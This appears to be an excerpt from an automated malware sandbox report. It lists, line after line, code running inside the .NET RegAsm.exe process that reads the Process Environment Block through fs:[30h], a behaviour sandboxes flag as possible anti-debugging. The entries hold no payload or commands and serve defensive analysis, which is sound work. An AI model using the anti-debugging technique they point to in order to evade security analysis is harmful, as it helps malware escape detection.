Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C892C5 mov eax, dword ptr fs:[00000030h]	3_2_02C892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C892C5 mov eax, dword ptr fs:[00000030h]	3_2_02C892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF2D0 mov eax, dword ptr fs:[00000030h]	3_2_02CAF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF2D0 mov eax, dword ptr fs:[00000030h]	3_2_02CAF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F2F8 mov eax, dword ptr fs:[00000030h]	3_2_02D3F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D552E2 mov eax, dword ptr fs:[00000030h]	3_2_02D552E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C792FF mov eax, dword ptr fs:[00000030h]	3_2_02C792FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE284 mov eax, dword ptr fs:[00000030h]	3_2_02CBE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE284 mov eax, dword ptr fs:[00000030h]	3_2_02CBE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB329E mov eax, dword ptr fs:[00000030h]	3_2_02CB329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB329E mov eax, dword ptr fs:[00000030h]	3_2_02CB329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55283 mov eax, dword ptr fs:[00000030h]	3_2_02D55283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902A0 mov eax, dword ptr fs:[00000030h]	3_2_02C902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902A0 mov eax, dword ptr fs:[00000030h]	3_2_02C902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov eax, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov eax, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov ecx, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov ecx, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D172A0 mov eax, dword ptr fs:[00000030h]	3_2_02D172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D172A0 mov eax, dword ptr fs:[00000030h]	3_2_02D172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov ecx, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B256 mov eax, dword ptr fs:[00000030h]	3_2_02D3B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B256 mov eax, dword ptr fs:[00000030h]	3_2_02D3B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB724D mov eax, dword ptr fs:[00000030h]	3_2_02CB724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79240 mov eax, dword ptr fs:[00000030h]	3_2_02C79240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79240 mov eax, dword ptr fs:[00000030h]	3_2_02C79240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86259 mov eax, dword ptr fs:[00000030h]	3_2_02C86259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A250 mov eax, dword ptr fs:[00000030h]	3_2_02C7A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7826B mov eax, dword ptr fs:[00000030h]	3_2_02C7826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC1270 mov eax, dword ptr fs:[00000030h]	3_2_02CC1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC1270 mov eax, dword ptr fs:[00000030h]	3_2_02CC1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA9274 mov eax, dword ptr fs:[00000030h]	3_2_02CA9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4D26B mov eax, dword ptr fs:[00000030h]	3_2_02D4D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4D26B mov eax, dword ptr fs:[00000030h]	3_2_02D4D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB7208 mov eax, dword ptr fs:[00000030h]	3_2_02CB7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB7208 mov eax, dword ptr fs:[00000030h]	3_2_02CB7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55227 mov eax, dword ptr fs:[00000030h]	3_2_02D55227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7823B mov eax, dword ptr fs:[00000030h]	3_2_02C7823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B3D0 mov ecx, dword ptr fs:[00000030h]	3_2_02D3B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C3CD mov eax, dword ptr fs:[00000030h]	3_2_02D3C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D553FC mov eax, dword ptr fs:[00000030h]	3_2_02D553FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB63FF mov eax, dword ptr fs:[00000030h]	3_2_02CB63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F3E6 mov eax, dword ptr fs:[00000030h]	3_2_02D3F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA438F mov eax, dword ptr fs:[00000030h]	3_2_02CA438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA438F mov eax, dword ptr fs:[00000030h]	3_2_02CA438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5539D mov eax, dword ptr fs:[00000030h]	3_2_02D5539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A mov eax, dword ptr fs:[00000030h]	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A mov eax, dword ptr fs:[00000030h]	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB33A0 mov eax, dword ptr fs:[00000030h]	3_2_02CB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB33A0 mov eax, dword ptr fs:[00000030h]	3_2_02CB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA33A5 mov eax, dword ptr fs:[00000030h]	3_2_02CA33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4A352 mov eax, dword ptr fs:[00000030h]	3_2_02D4A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C mov eax, dword ptr fs:[00000030h]	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C mov eax, dword ptr fs:[00000030h]	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov ecx, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55341 mov eax, dword ptr fs:[00000030h]	3_2_02D55341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79353 mov eax, dword ptr fs:[00000030h]	3_2_02C79353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79353 mov eax, dword ptr fs:[00000030h]	3_2_02C79353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2437C mov eax, dword ptr fs:[00000030h]	3_2_02D2437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F367 mov eax, dword ptr fs:[00000030h]	3_2_02D3F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C310 mov ecx, dword ptr fs:[00000030h]	3_2_02C7C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA0310 mov ecx, dword ptr fs:[00000030h]	3_2_02CA0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF32A mov eax, dword ptr fs:[00000030h]	3_2_02CAF32A
